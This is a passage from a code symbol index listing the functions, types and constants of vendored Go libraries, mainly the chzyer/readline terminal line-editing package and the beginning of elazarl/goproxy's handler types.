... function Print (line 38) | func Print(p PrefixCompleterInterface, prefix string, level int, buf *by... function NewPrefixCompleter (line 82) | func NewPrefixCompleter(pc ...PrefixCompleterInterface) *PrefixCompleter { function PcItem (line 86) | func PcItem(name string, pc ...PrefixCompleterInterface) *PrefixCompleter { function PcItemDynamic (line 95) | func PcItemDynamic(callback DynamicCompleteFunc, pc ...PrefixCompleterIn... function Do (line 107) | func Do(p PrefixCompleterInterface, line []rune, pos int) (newLine [][]r... function doInternal (line 111) | func doInternal(p PrefixCompleterInterface, line []rune, pos int, origLi... FILE: vendor/github.com/chzyer/readline/complete_segment.go type SegmentCompleter (line 3) | type SegmentCompleter interface type dumpSegmentCompleter (line 20) | type dumpSegmentCompleter struct method DoSegment (line 24) | func (d *dumpSegmentCompleter) DoSegment(segment [][]rune, n int) [][]... function SegmentFunc (line 28) | func SegmentFunc(f func([][]rune, int) [][]rune) AutoCompleter { function SegmentAutoComplete (line 32) | func SegmentAutoComplete(completer SegmentCompleter) *SegmentComplete { type SegmentComplete (line 38) | type SegmentComplete struct method Do (line 72) | func (c *SegmentComplete) Do(line []rune, pos int) (newLine [][]rune, ... function RetSegment (line 42) | func RetSegment(segments [][]rune, cands [][]rune, idx int) ([][]rune, i... function SplitSegment (line 54) | func SplitSegment(line []rune, pos int) ([][]rune, int) { FILE: vendor/github.com/chzyer/readline/history.go type hisItem (line 12) | type hisItem struct method Clean (line 18) | func (h *hisItem) Clean() { type opHistory (line 23) | type opHistory struct method Reset (line 42) | func (o *opHistory) Reset() { method IsHistoryClosed (line 47) | func (o *opHistory) IsHistoryClosed() bool { method Init (line 53) | func (o *opHistory) Init() { method initHistory (line 59) | func (o *opHistory) initHistory() { method historyUpdatePath (line 66) | func (o *opHistory) historyUpdatePath(path string) { method Compact (line 97) | func (o *opHistory) Compact() { method Rewrite (line 103) | func (o *opHistory) Rewrite() { method rewriteLocked (line 109) | func (o *opHistory) rewriteLocked() { method Close (line 139) | func (o *opHistory) Close() { method FindBck (line 147) | func (o *opHistory) FindBck(isNewSearch bool, rs []rune, start int) (i... method FindFwd (line 167) | func (o *opHistory) FindFwd(isNewSearch bool, rs []rune, start int) (i... method showItem (line 195) | func (o *opHistory) showItem(obj interface{}) []rune { method Prev (line 203) | func (o *opHistory) Prev() []rune { method Next (line 215) | func (o *opHistory) Next() ([]rune, bool) { method Disable (line 229) | func (o *opHistory) Disable() { method Enable (line 234) | func (o *opHistory) Enable() { method debug (line 238) | func (o *opHistory) debug() { method New (line 246) | func (o *opHistory) New(current []rune) (err error) { method Revert (line 296) | func (o *opHistory) Revert() { method Update (line 301) | func (o *opHistory) Update(s []rune, commit bool) (err error) { method Push (line 326) | func (o *opHistory) Push(s []rune) { function newOpHistory (line 33) | func newOpHistory(cfg *Config) (o *opHistory) { FILE: vendor/github.com/chzyer/readline/operation.go type InterruptError (line 13) | type InterruptError struct method Error (line 17) | func (*InterruptError) Error() string { type Operation (line 21) | type Operation struct method SetBuffer (line 37) | func (o *Operation) SetBuffer(what string) { method SetPrompt (line 92) | func (o *Operation) SetPrompt(s string) { method SetMaskRune (line 96) | func (o *Operation) SetMaskRune(r rune) { method GetConfig (line 100) | func (o *Operation) GetConfig() *Config { method ioloop (line 107) | func (o *Operation) ioloop() { method Stderr (line 366) | func (o *Operation) Stderr() io.Writer { method Stdout (line 370) | func (o *Operation) Stdout() io.Writer { method String (line 374) | func (o *Operation) String() (string, error) { method Runes (line 379) | func (o *Operation) Runes() ([]rune, error) { method PasswordEx (line 401) | func (o *Operation) PasswordEx(prompt string, l Listener) ([]byte, err... method GenPasswordConfig (line 408) | func (o *Operation) GenPasswordConfig() *Config { method PasswordWithConfig (line 412) | func (o *Operation) PasswordWithConfig(cfg *Config) ([]byte, error) { method Password (line 420) | func (o *Operation) Password(prompt string) ([]byte, error) { method SetTitle (line 424) | func (o *Operation) SetTitle(t string) { method Slice (line 428) | func (o *Operation) Slice() ([]byte, error) { method Close (line 436) | func (o *Operation) Close() { method SetHistoryPath (line 440) | func (o *Operation) SetHistoryPath(path string) { method IsNormalMode (line 448) | func (o *Operation) IsNormalMode() bool { method SetConfig (line 452) | func (op *Operation) SetConfig(cfg *Config) (*Config, error) { method ResetHistory (line 487) | func (o *Operation) ResetHistory() { method SaveHistory (line 493) | func (o *Operation) SaveHistory(content string) error { method Refresh (line 497) | func (o *Operation) Refresh() { method Clean (line 503) | func (o *Operation) Clean() { type wrapWriter (line 41) | type wrapWriter struct method Write (line 47) | func (w *wrapWriter) Write(b []byte) (int, error) { function NewOperation (line 69) | func NewOperation(t *Terminal, cfg *Config) *Operation { function FuncListener (line 507) | func FuncListener(f func(line []rune, pos int, key rune) (newLine []rune... type DumpListener (line 511) | type DumpListener struct method OnChange (line 515) | func (d *DumpListener) OnChange(line []rune, pos int, key rune) (newLi... type Listener (line 519) | type Listener interface type Painter (line 523) | type Painter interface type defaultPainter (line 527) | type defaultPainter struct method Paint (line 529) | func (p *defaultPainter) Paint(line []rune, _ int) []rune { FILE: vendor/github.com/chzyer/readline/password.go type opPassword (line 3) | type opPassword struct method ExitPasswordMode (line 12) | func (o *opPassword) ExitPasswordMode() { method EnterPasswordMode (line 17) | func (o *opPassword) EnterPasswordMode(cfg *Config) (err error) { method PasswordConfig (line 22) | func (o *opPassword) PasswordConfig() *Config { function newOpPassword (line 8) | func newOpPassword(o *Operation) *opPassword { FILE: vendor/github.com/chzyer/readline/rawreader_windows.go constant VK_CANCEL (line 8) | VK_CANCEL = 0x03 constant VK_BACK (line 9) | VK_BACK = 0x08 constant VK_TAB (line 10) | VK_TAB = 0x09 constant VK_RETURN (line 11) | VK_RETURN = 0x0D constant VK_SHIFT (line 12) | VK_SHIFT = 0x10 constant VK_CONTROL (line 13) | VK_CONTROL = 0x11 constant VK_MENU (line 14) | VK_MENU = 0x12 constant VK_ESCAPE (line 15) | VK_ESCAPE = 0x1B constant VK_LEFT (line 16) | VK_LEFT = 0x25 constant VK_UP (line 17) | VK_UP = 0x26 constant VK_RIGHT (line 18) | VK_RIGHT = 0x27 constant VK_DOWN (line 19) | VK_DOWN = 0x28 constant VK_DELETE (line 20) | VK_DELETE = 0x2E constant VK_LSHIFT (line 21) | VK_LSHIFT = 0xA0 constant VK_RSHIFT (line 22) | VK_RSHIFT = 0xA1 constant VK_LCONTROL (line 23) | VK_LCONTROL = 0xA2 constant VK_RCONTROL (line 24) | VK_RCONTROL = 0xA3 type RawReader (line 29) | type RawReader struct method Read (line 40) | func (r *RawReader) Read(buf []byte) (int, error) { method writeEsc (line 112) | func (r *RawReader) writeEsc(b []byte, char rune) (int, error) { method write (line 118) | func (r *RawReader) write(b []byte, char rune) (int, error) { method Close (line 123) | func (r *RawReader) Close() error { function NewRawReader (line 34) | func NewRawReader() *RawReader { FILE: vendor/github.com/chzyer/readline/readline.go type Instance (line 22) | type Instance struct method ResetHistory (line 182) | func (i *Instance) ResetHistory() { method SetPrompt (line 186) | func (i *Instance) SetPrompt(s string) { method SetMaskRune (line 190) | func (i *Instance) SetMaskRune(r rune) { method SetHistoryPath (line 195) | func (i *Instance) SetHistoryPath(p string) { method Stdout (line 200) | func (i *Instance) Stdout() io.Writer { method Stderr (line 205) | func (i *Instance) Stderr() io.Writer { method SetVimMode (line 210) | func (i *Instance) SetVimMode(on bool) { method IsVimMode (line 214) | func (i *Instance) IsVimMode() bool { method GenPasswordConfig (line 218) | func (i *Instance) GenPasswordConfig() *Config { method ReadPasswordWithConfig (line 223) | func (i *Instance) ReadPasswordWithConfig(cfg *Config) ([]byte, error) { method ReadPasswordEx (line 227) | func (i *Instance) ReadPasswordEx(prompt string, l Listener) ([]byte, ... method ReadPassword (line 231) | func (i *Instance) ReadPassword(prompt string) ([]byte, error) { method Line (line 248) | func (i *Instance) Line() *Result { method Readline (line 254) | func (i *Instance) Readline() (string, error) { method ReadlineWithDefault (line 258) | func (i *Instance) ReadlineWithDefault(what string) (string, error) { method SaveHistory (line 263) | func (i *Instance) SaveHistory(content string) error { method ReadSlice (line 268) | func (i *Instance) ReadSlice() ([]byte, error) { method Close (line 273) | func (i *Instance) Close() error { method Clean (line 281) | func (i *Instance) Clean() { method Write (line 285) | func (i *Instance) Write(b []byte) (int, error) { method WriteStdin (line 299) | func (i *Instance) WriteStdin(val []byte) (int, error) { method SetConfig (line 303) | func (i *Instance) SetConfig(cfg *Config) *Config { method Refresh (line 314) | func (i *Instance) Refresh() { method HistoryDisable (line 319) | func (i *Instance) HistoryDisable() { method HistoryEnable (line 324) | func (i *Instance) HistoryEnable() { type Config (line 28) | type Config struct method useInteractive (line 86) | func (c *Config) useInteractive() bool { method Init (line 93) | func (c *Config) Init() error { method Clone (line 148) | func (c Config) Clone() *Config { method SetListener (line 154) | func (c *Config) SetListener(f func(line []rune, pos int, key rune) (n... method SetPainter (line 158) | func (c *Config) SetPainter(p Painter) { function NewEx (line 162) | func NewEx(cfg *Config) (*Instance, error) { function New (line 178) | func New(prompt string) (*Instance, error) { type Result (line 235) | type Result struct method CanContinue (line 240) | func (l *Result) CanContinue() bool { method CanBreak (line 244) | func (l *Result) CanBreak() bool { FILE: vendor/github.com/chzyer/readline/remote.go type MsgType (line 15) | type MsgType constant T_DATA (line 18) | T_DATA = MsgType(iota) constant T_WIDTH (line 19) | T_WIDTH constant T_WIDTH_REPORT (line 20) | T_WIDTH_REPORT constant T_ISTTY_REPORT (line 21) | T_ISTTY_REPORT constant T_RAW (line 22) | T_RAW constant T_ERAW (line 23) | T_ERAW constant T_EOF (line 24) | T_EOF type RemoteSvr (line 27) | type RemoteSvr struct method init (line 78) | func (r *RemoteSvr) init(buf *bufio.Reader) error { method HandleConfig (line 102) | func (r *RemoteSvr) HandleConfig(cfg *Config) { method IsTerminal (line 116) | func (r *RemoteSvr) IsTerminal() bool { method checkEOF (line 120) | func (r *RemoteSvr) checkEOF() error { method Read (line 127) | func (r *RemoteSvr) Read(b []byte) (int, error) { method writeMsg (line 152) | func (r *RemoteSvr) writeMsg(m *Message) error { method Write (line 159) | func (r *RemoteSvr) Write(b []byte) (int, error) { method EnterRawMode (line 166) | func (r *RemoteSvr) EnterRawMode() error { method ExitRawMode (line 170) | func (r *RemoteSvr) ExitRawMode() error { method writeLoop (line 174) | func (r *RemoteSvr) writeLoop() { method Close (line 192) | func (r *RemoteSvr) Close() error { method readLoop (line 200) | func (r *RemoteSvr) readLoop(buf *bufio.Reader) { method GotIsTerminal (line 230) | func (r *RemoteSvr) GotIsTerminal(data []byte) { method GotReportWidth (line 238) | func (r *RemoteSvr) GotReportWidth(data []byte) { method GetWidth (line 245) | func (r *RemoteSvr) GetWidth() int { type writeReply (line 42) | type writeReply struct type writeCtx (line 47) | type writeCtx struct function newWriteCtx (line 52) | func newWriteCtx(msg *Message) *writeCtx { function NewRemoteSvr (line 59) | func NewRemoteSvr(conn net.Conn) (*RemoteSvr, error) { type Message (line 251) | type Message struct method WriteTo (line 276) | func (m *Message) WriteTo(w io.Writer) (int, error) { function ReadMessage (line 256) | func ReadMessage(r io.Reader) (*Message, error) { function NewMessage (line 272) | func NewMessage(t MsgType, data []byte) *Message { type RemoteCli (line 287) | type RemoteCli struct method MarkIsTerminal (line 306) | func (r *RemoteCli) MarkIsTerminal(is bool) { method init (line 310) | func (r *RemoteCli) init() error { method writeMsg (line 330) | func (r *RemoteCli) writeMsg(m *Message) error { method Write (line 337) | func (r *RemoteCli) Write(b []byte) (int, error) { method reportWidth (line 345) | func (r *RemoteCli) reportWidth() error { method reportIsTerminal (line 357) | func (r *RemoteCli) reportIsTerminal() error { method readLoop (line 377) | func (r *RemoteCli) readLoop() { method ServeBy (line 395) | func (r *RemoteCli) ServeBy(source io.Reader) error { method Close (line 414) | func (r *RemoteCli) Close() { method Serve (line 418) | func (r *RemoteCli) Serve() error { function NewRemoteCli (line 298) | func NewRemoteCli(conn net.Conn) (*RemoteCli, error) { function ListenRemote (line 422) | func ListenRemote(n, addr string, cfg *Config, h func(*Instance), onList... function HandleConn (line 449) | func HandleConn(cfg Config, conn net.Conn) (*Instance, error) { function DialRemote (line 463) | func DialRemote(n, addr string) error { FILE: vendor/github.com/chzyer/readline/runebuf.go type runeBufferBck (line 12) | type runeBufferBck struct type RuneBuffer (line 17) | type RuneBuffer struct method pushKill (line 38) | func (r* RuneBuffer) pushKill(text []rune) { method OnWidthChange (line 42) | func (r *RuneBuffer) OnWidthChange(newWidth int) { method Backup (line 48) | func (r *RuneBuffer) Backup() { method Restore (line 54) | func (r *RuneBuffer) Restore() { method SetConfig (line 75) | func (r *RuneBuffer) SetConfig(cfg *Config) { method SetMask (line 82) | func (r *RuneBuffer) SetMask(m rune) { method CurrentWidth (line 88) | func (r *RuneBuffer) CurrentWidth(x int) int { method PromptLen (line 94) | func (r *RuneBuffer) PromptLen() int { method promptLen (line 101) | func (r *RuneBuffer) promptLen() int { method RuneSlice (line 105) | func (r *RuneBuffer) RuneSlice(i int) []rune { method Runes (line 119) | func (r *RuneBuffer) Runes() []rune { method Pos (line 127) | func (r *RuneBuffer) Pos() int { method Len (line 133) | func (r *RuneBuffer) Len() int { method MoveToLineStart (line 139) | func (r *RuneBuffer) MoveToLineStart() { method MoveBackward (line 148) | func (r *RuneBuffer) MoveBackward() { method WriteString (line 157) | func (r *RuneBuffer) WriteString(s string) { method WriteRune (line 161) | func (r *RuneBuffer) WriteRune(s rune) { method WriteRunes (line 165) | func (r *RuneBuffer) WriteRunes(s []rune) { method MoveForward (line 173) | func (r *RuneBuffer) MoveForward() { method IsCursorInEnd (line 182) | func (r *RuneBuffer) IsCursorInEnd() bool { method Replace (line 188) | func (r *RuneBuffer) Replace(ch rune) { method Erase (line 194) | func (r *RuneBuffer) Erase() { method Delete (line 202) | func (r *RuneBuffer) Delete() (success bool) { method DeleteWord (line 214) | func (r *RuneBuffer) DeleteWord() { method MoveToPrevWord (line 234) | func (r *RuneBuffer) MoveToPrevWord() (success bool) { method KillFront (line 253) | func (r *RuneBuffer) KillFront() { method Kill (line 267) | func (r *RuneBuffer) Kill() { method Transpose (line 274) | func (r *RuneBuffer) Transpose() { method MoveToNextWord (line 294) | func (r *RuneBuffer) MoveToNextWord() { method MoveToEndWord (line 307) | func (r *RuneBuffer) MoveToEndWord() { method BackEscapeWord (line 329) | func (r *RuneBuffer) BackEscapeWord() { method Yank (line 348) | func (r *RuneBuffer) Yank() { method Backspace (line 362) | func (r *RuneBuffer) Backspace() { method MoveToLineEnd (line 373) | func (r *RuneBuffer) MoveToLineEnd() { method LineCount (line 383) | func (r *RuneBuffer) LineCount(width int) int { method MoveTo (line 391) | func (r *RuneBuffer) MoveTo(ch rune, prevChar, reverse bool) (success ... method isInLineEdge (line 420) | func (r *RuneBuffer) isInLineEdge() bool { method getSplitByLine (line 428) | func (r *RuneBuffer) getSplitByLine(rs []rune) []string { method IdxLine (line 432) | func (r *RuneBuffer) IdxLine(width int) int { method idxLine (line 438) | func (r *RuneBuffer) idxLine(width int) int { method CursorLineCount (line 446) | func (r *RuneBuffer) CursorLineCount() int { method Refresh (line 450) | func (r *RuneBuffer) Refresh(f func()) { method SetOffset (line 468) | func (r *RuneBuffer) SetOffset(offset string) { method print (line 474) | func (r *RuneBuffer) print() { method output (line 479) | func (r *RuneBuffer) output() []byte { method getBackspaceSequence (line 512) | func (r *RuneBuffer) getBackspaceSequence() []byte { method Reset (line 542) | func (r *RuneBuffer) Reset() []rune { method calWidth (line 549) | func (r *RuneBuffer) calWidth(m int) int { method SetStyle (line 556) | func (r *RuneBuffer) SetStyle(start, end int, style string) { method SetWithIdx (line 574) | func (r *RuneBuffer) SetWithIdx(idx int, buf []rune) { method Set (line 581) | func (r *RuneBuffer) Set(buf []rune) { method SetPrompt (line 585) | func (r *RuneBuffer) SetPrompt(prompt string) { method cleanOutput (line 591) | func (r *RuneBuffer) cleanOutput(w io.Writer, idxLine int) { method Clean (line 613) | func (r *RuneBuffer) Clean() { method clean (line 619) | func (r *RuneBuffer) clean() { method cleanWithIdxLine (line 623) | func (r *RuneBuffer) cleanWithIdxLine(idxLine int) { function NewRuneBuffer (line 64) | func NewRuneBuffer(w io.Writer, prompt string, cfg *Config, width int) *... FILE: vendor/github.com/chzyer/readline/runes.go type Runes (line 12) | type Runes struct method EqualRune (line 14) | func (Runes) EqualRune(a, b rune, fold bool) bool { method EqualRuneFold (line 32) | func (r Runes) EqualRuneFold(a, b rune) bool { method EqualFold (line 36) | func (r Runes) EqualFold(a, b []rune) bool { method Equal (line 50) | func (Runes) Equal(a, b []rune) bool { method IndexAllBckEx (line 62) | func (rs Runes) IndexAllBckEx(r, sub []rune, fold bool) int { method IndexAllBck (line 79) | func (rs Runes) IndexAllBck(r, sub []rune) int { method IndexAll (line 84) | func (rs Runes) IndexAll(r, sub []rune) int { method IndexAllEx (line 88) | func (rs Runes) IndexAllEx(r, sub []rune, fold bool) int { method Index (line 107) | func (Runes) Index(r rune, rs []rune) int { method ColorFilter (line 116) | func (Runes) ColorFilter(r []rune) []rune { method Width (line 146) | func (Runes) Width(r rune) int { method WidthAll (line 159) | func (Runes) WidthAll(r []rune) (length int) { method Backspace (line 166) | func (Runes) Backspace(r []rune) []byte { method Copy (line 170) | func (Runes) Copy(r []rune) []rune { method HasPrefixFold (line 176) | func (Runes) HasPrefixFold(r, prefix []rune) bool { method HasPrefix (line 183) | func (Runes) HasPrefix(r, prefix []rune) bool { method Aggregate (line 190) | func (Runes) Aggregate(candicate [][]rune) (same []rune, size int) { method TrimSpaceLeft (line 214) | func (Runes) TrimSpaceLeft(in []rune) []rune { FILE: vendor/github.com/chzyer/readline/search.go constant S_STATE_FOUND (line 11) | S_STATE_FOUND = iota constant S_STATE_FAILING (line 12) | S_STATE_FAILING constant S_DIR_BCK (line 16) | S_DIR_BCK = iota constant S_DIR_FWD (line 17) | S_DIR_FWD type opSearch (line 20) | type opSearch struct method OnWidthChange (line 45) | func (o *opSearch) OnWidthChange(newWidth int) { method IsSearchMode (line 49) | func (o *opSearch) IsSearchMode() bool { method SearchBackspace (line 53) | func (o *opSearch) SearchBackspace() { method findHistoryBy (line 60) | func (o *opSearch) findHistoryBy(isNewSearch bool) (int, *list.Element) { method search (line 67) | func (o *opSearch) search(isChange bool) bool { method SearchChar (line 94) | func (o *opSearch) SearchChar(r rune) { method SearchMode (line 99) | func (o *opSearch) SearchMode(dir int) bool { method ExitSearchMode (line 115) | func (o *opSearch) ExitSearchMode(revert bool) { method SearchRefresh (line 127) | func (o *opSearch) SearchRefresh(x int) { function newOpSearch (line 35) | func newOpSearch(w io.Writer, buf *RuneBuffer, history *opHistory, cfg *... FILE: vendor/github.com/chzyer/readline/std.go function getInstance (line 22) | func getInstance() *Instance { function SetHistoryPath (line 35) | func SetHistoryPath(fp string) { function SetAutoComplete (line 43) | func SetAutoComplete(completer AutoCompleter) { function AddHistory (line 52) | func AddHistory(content string) error { function Password (line 57) | func Password(prompt string) ([]byte, error) { function Line (line 63) | func Line(prompt string) (string, error) { type CancelableStdin (line 69) | type CancelableStdin struct method ioloop (line 90) | func (c *CancelableStdin) ioloop() { method Read (line 107) | func (c *CancelableStdin) Read(b []byte) (n int, err error) { method Close (line 128) | func (c *CancelableStdin) Close() error { function NewCancelableStdin (line 80) | func NewCancelableStdin(r io.Reader) *CancelableStdin { type FillableStdin (line 137) | type FillableStdin struct method ioloop (line 156) | func (s *FillableStdin) ioloop() { method Read (line 175) | func (s *FillableStdin) Read(p []byte) (n int, err error) { method Close (line 194) | func (s *FillableStdin) Close() error { function NewFillableStdin (line 146) | func NewFillableStdin(stdin io.Reader) (io.ReadCloser, io.Writer) { FILE: vendor/github.com/chzyer/readline/std_windows.go function init (line 5) | func init() { FILE: vendor/github.com/chzyer/readline/term.go type State (line 25) | type State struct function IsTerminal (line 30) | func IsTerminal(fd int) bool { function MakeRaw (line 38) | func MakeRaw(fd int) (*State, error) { function GetState (line 64) | func GetState(fd int) (*State, error) { function restoreTerm (line 75) | func restoreTerm(fd int, state *State) error { function ReadPassword (line 82) | func ReadPassword(fd int) ([]byte, error) { FILE: vendor/github.com/chzyer/readline/term_bsd.go function getTermios (line 14) | func getTermios(fd int) (*Termios, error) { function setTermios (line 23) | func setTermios(fd int, termios *Termios) error { FILE: vendor/github.com/chzyer/readline/term_linux.go constant ioctlReadTermios (line 15) | ioctlReadTermios = 0x5401 constant ioctlWriteTermios (line 16) | ioctlWriteTermios = 0x5402 function getTermios (line 18) | func getTermios(fd int) (*Termios, error) { function setTermios (line 27) | func setTermios(fd int, termios *Termios) error { FILE: vendor/github.com/chzyer/readline/term_solaris.go function GetSize (line 12) | func GetSize(fd int) (int, int, error) { type Termios (line 20) | type Termios function getTermios (line 22) | func getTermios(fd int) (*Termios, error) { function setTermios (line 30) | func setTermios(fd int, termios *Termios) error { FILE: vendor/github.com/chzyer/readline/term_unix.go type Termios (line 14) | type Termios function GetSize (line 17) | func GetSize(fd int) (int, int, error) { FILE: vendor/github.com/chzyer/readline/term_windows.go constant enableLineInput (line 26) | enableLineInput = 2 constant enableEchoInput (line 27) | enableEchoInput = 4 constant enableProcessedInput (line 28) | enableProcessedInput = 1 constant enableWindowInput (line 29) | enableWindowInput = 8 constant enableMouseInput (line 30) | enableMouseInput = 16 constant enableInsertMode (line 31) | enableInsertMode = 32 constant enableQuickEditMode (line 32) | enableQuickEditMode = 64 constant enableExtendedFlags (line 33) | enableExtendedFlags = 128 constant enableAutoPosition (line 34) | enableAutoPosition = 256 constant enableProcessedOutput (line 35) | enableProcessedOutput = 1 constant enableWrapAtEolOutput (line 36) | enableWrapAtEolOutput = 2 type coord (line 48) | type coord struct type smallRect (line 52) | type smallRect struct type consoleScreenBufferInfo (line 58) | type consoleScreenBufferInfo struct type State (line 67) | type State struct function IsTerminal (line 72) | func IsTerminal(fd int) bool { function MakeRaw (line 81) | func MakeRaw(fd int) (*State, error) { function GetState (line 97) | func GetState(fd int) (*State, error) { function restoreTerm (line 108) | func restoreTerm(fd int, state *State) error { function GetSize (line 114) | func GetSize(fd int) (width, height int, err error) { function ReadPassword (line 126) | func ReadPassword(fd int) ([]byte, error) { FILE: vendor/github.com/chzyer/readline/terminal.go type Terminal (line 12) | type Terminal struct method SleepToResume (line 43) | func (t *Terminal) SleepToResume() { method EnterRawMode (line 56) | func (t *Terminal) EnterRawMode() (err error) { method ExitRawMode (line 60) | func (t *Terminal) ExitRawMode() (err error) { method Write (line 64) | func (t *Terminal) Write(b []byte) (int, error) { method WriteStdin (line 70) | func (t *Terminal) WriteStdin(b []byte) (int, error) { method GetOffset (line 79) | func (t *Terminal) GetOffset(f func(offset string)) { method Print (line 86) | func (t *Terminal) Print(s string) { method PrintRune (line 90) | func (t *Terminal) PrintRune(r rune) { method Readline (line 94) | func (t *Terminal) Readline() *Operation { method ReadRune (line 99) | func (t *Terminal) ReadRune() rune { method IsReading (line 107) | func (t *Terminal) IsReading() bool { method KickRead (line 111) | func (t *Terminal) KickRead() { method ioloop (line 118) | func (t *Terminal) ioloop() { method Bell (line 200) | func (t *Terminal) Bell() { method Close (line 204) | func (t *Terminal) Close() error { method GetConfig (line 216) | func (t *Terminal) GetConfig() *Config { method getStdin (line 223) | func (t *Terminal) getStdin() io.Reader { method SetConfig (line 230) | func (t *Terminal) SetConfig(c *Config) error { function NewTerminal (line 26) | func NewTerminal(cfg *Config) (*Terminal, error) { type termSize (line 74) | type termSize struct FILE: vendor/github.com/chzyer/readline/utils.go constant CharLineStart (line 21) | CharLineStart = 1 constant CharBackward (line 22) | CharBackward = 2 constant CharInterrupt (line 23) | CharInterrupt = 3 constant CharDelete (line 24) | CharDelete = 4 constant CharLineEnd (line 25) | CharLineEnd = 5 constant CharForward (line 26) | CharForward = 6 constant CharBell (line 27) | CharBell = 7 constant CharCtrlH (line 28) | CharCtrlH = 8 constant CharTab (line 29) | CharTab = 9 constant CharCtrlJ (line 30) | CharCtrlJ = 10 constant CharKill (line 31) | CharKill = 11 constant CharCtrlL (line 32) | CharCtrlL = 12 constant CharEnter (line 33) | CharEnter = 13 constant CharNext (line 34) | CharNext = 14 constant CharPrev (line 35) | CharPrev = 16 constant CharBckSearch (line 36) | CharBckSearch = 18 constant CharFwdSearch (line 37) | CharFwdSearch = 19 constant CharTranspose (line 38) | CharTranspose = 20 constant CharCtrlU (line 39) | CharCtrlU = 21 constant CharCtrlW (line 40) | CharCtrlW = 23 constant CharCtrlY (line 41) | CharCtrlY = 25 constant CharCtrlZ (line 42) | CharCtrlZ = 26 constant CharEsc (line 43) | CharEsc = 27 constant CharEscapeEx (line 44) | CharEscapeEx = 91 constant CharBackspace (line 45) | CharBackspace = 127 constant MetaBackward (line 49) | MetaBackward rune = -iota - 1 constant MetaForward (line 50) | MetaForward constant MetaDelete (line 51) | MetaDelete constant MetaBackspace (line 52) | MetaBackspace constant MetaTranspose (line 53) | MetaTranspose function WaitForResume (line 59) | func WaitForResume() chan struct{} { function Restore (line 81) | func Restore(fd int, state *State) error { function IsPrintable (line 94) | func IsPrintable(key rune) bool { function escapeExKey (line 100) | func escapeExKey(key *escapeKeyPair) rune { type escapeKeyPair (line 124) | type escapeKeyPair struct method Get2 (line 129) | func (e *escapeKeyPair) Get2() (int, int, bool) { function readEscKey (line 145) | func readEscKey(r rune, reader *bufio.Reader) *escapeKeyPair { function escapeKey (line 163) | func escapeKey(r rune, reader *bufio.Reader) rune { function SplitByLine (line 191) | func SplitByLine(start, screenWidth int, rs []rune) []string { function LineCount (line 210) | func LineCount(screenWidth, w int) int { function IsWordBreak (line 218) | func IsWordBreak(i rune) bool { function GetInt (line 229) | func GetInt(s []string, def int) int { type RawMode (line 240) | type RawMode struct method Enter (line 244) | func (r *RawMode) Enter() (err error) { method Exit (line 249) | func (r *RawMode) Exit() error { function sleep (line 258) | func sleep(n int) { function debugList (line 264) | func debugList(l *list.List) { function Debug (line 273) | func Debug(o ...interface{}) { FILE: vendor/github.com/chzyer/readline/utils_unix.go type winsize (line 13) | type winsize struct function SuspendMe (line 23) | func SuspendMe() { function getWidth (line 31) | func getWidth(stdoutFd int) int { function GetScreenWidth (line 39) | func GetScreenWidth() int { function ClearScreen (line 48) | func ClearScreen(w io.Writer) (int, error) { function DefaultIsTerminal (line 52) | func DefaultIsTerminal() bool { function GetStdin (line 56) | func GetStdin() int { function DefaultOnWidthChanged (line 67) | func DefaultOnWidthChanged(f func()) { FILE: vendor/github.com/chzyer/readline/utils_windows.go function SuspendMe (line 10) | func SuspendMe() { function GetStdin (line 13) | func GetStdin() int { function init (line 17) | func init() { function GetScreenWidth (line 22) | func GetScreenWidth() int { function ClearScreen (line 31) | func ClearScreen(_ io.Writer) error { function DefaultIsTerminal (line 35) | func DefaultIsTerminal() bool { function DefaultOnWidthChanged (line 39) | func DefaultOnWidthChanged(func()) { FILE: vendor/github.com/chzyer/readline/vim.go constant VIM_NORMAL (line 4) | VIM_NORMAL = iota constant VIM_INSERT (line 5) | VIM_INSERT constant VIM_VISUAL (line 6) | VIM_VISUAL type opVim (line 9) | type opVim struct method SetVimMode (line 24) | func (o *opVim) SetVimMode(on bool) { method ExitVimMode (line 32) | func (o *opVim) ExitVimMode() { method IsEnableVimMode (line 36) | func (o *opVim) IsEnableVimMode() bool { method handleVimNormalMovement (line 40) | func (o *opVim) handleVimNormalMovement(r rune, readNext func() rune) ... method handleVimNormalEnterInsert (line 98) | func (o *opVim) handleVimNormalEnterInsert(r rune, readNext func() run... method HandleVimNormal (line 133) | func (o *opVim) HandleVimNormal(r rune, readNext func() rune) (t rune) { method EnterVimInsertMode (line 153) | func (o *opVim) EnterVimInsertMode() { method ExitVimInsertMode (line 157) | func (o *opVim) ExitVimInsertMode() { method HandleVim (line 161) | func (o *opVim) HandleVim(r rune, readNext func() rune) rune { function newVimMode (line 15) | func newVimMode(op *Operation) *opVim { FILE: vendor/github.com/chzyer/readline/windows_api.go type Kernel (line 17) | type Kernel struct method Wrap (line 105) | func (k *Kernel) Wrap(p *syscall.LazyProc) CallFunc { type short (line 28) | type short type word (line 29) | type word type dword (line 30) | type dword type wchar (line 31) | type wchar type _COORD (line 33) | type _COORD struct method ptr (line 38) | func (c *_COORD) ptr() uintptr { constant EVENT_KEY (line 43) | EVENT_KEY = 0x0001 constant EVENT_MOUSE (line 44) | EVENT_MOUSE = 0x0002 constant EVENT_WINDOW_BUFFER_SIZE (line 45) | EVENT_WINDOW_BUFFER_SIZE = 0x0004 constant EVENT_MENU (line 46) | EVENT_MENU = 0x0008 constant EVENT_FOCUS (line 47) | EVENT_FOCUS = 0x0010 type _KEY_EVENT_RECORD (line 50) | type _KEY_EVENT_RECORD struct type _INPUT_RECORD (line 64) | type _INPUT_RECORD struct type _CONSOLE_SCREEN_BUFFER_INFO (line 70) | type _CONSOLE_SCREEN_BUFFER_INFO struct type _SMALL_RECT (line 78) | type _SMALL_RECT struct type _CONSOLE_CURSOR_INFO (line 85) | type _CONSOLE_CURSOR_INFO struct type CallFunc (line 90) | type CallFunc function NewKernel (line 92) | func NewKernel() *Kernel { function GetConsoleScreenBufferInfo (line 135) | func GetConsoleScreenBufferInfo() (*_CONSOLE_SCREEN_BUFFER_INFO, error) { function GetConsoleCursorInfo (line 144) | func GetConsoleCursorInfo() (*_CONSOLE_CURSOR_INFO, error) { function SetConsoleCursorPosition (line 150) | func SetConsoleCursorPosition(c *_COORD) error { FILE: vendor/github.com/elazarl/goproxy/actions.go type ReqHandler (line 10) | type ReqHandler interface type FuncReqHandler (line 15) | type FuncReqHandler method Handle (line 18) | func (f FuncReqHandler) Handle(req *http.Request, ctx *ProxyCtx) (*htt... type RespHandler (line 26) | type RespHandler interface type FuncRespHandler (line 31) | type FuncRespHandler method Handle (line 34) | func (f FuncRespHandler) Handle(resp *http.Response, 